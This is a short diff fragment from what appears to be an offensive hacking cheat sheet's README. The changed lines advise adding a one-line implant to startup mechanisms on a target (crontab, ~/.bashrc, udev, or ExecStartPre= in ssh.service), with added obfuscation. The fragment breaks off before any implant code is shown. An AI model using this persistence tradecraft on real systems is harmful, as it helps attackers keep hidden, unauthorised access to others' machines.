hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 rm -f x.txt
 ```

-2. Add this 1-line implant to any startup script on the target (e.g. to [udev](https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp) or `ExecStartPre=` in */usr/lib/systemd/system/ssh.service*).
-An clever example for ssh.service:
+2. Add the 1-line implant to any startup script on the target (use crontab, ~/.bashrc, [udev](https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp) or `ExecStartPre=`).
+Here is a clever example for */usr/lib/systemd/system/ssh.service* (with some additional obfuscation):
 ```
 ...
 [Service]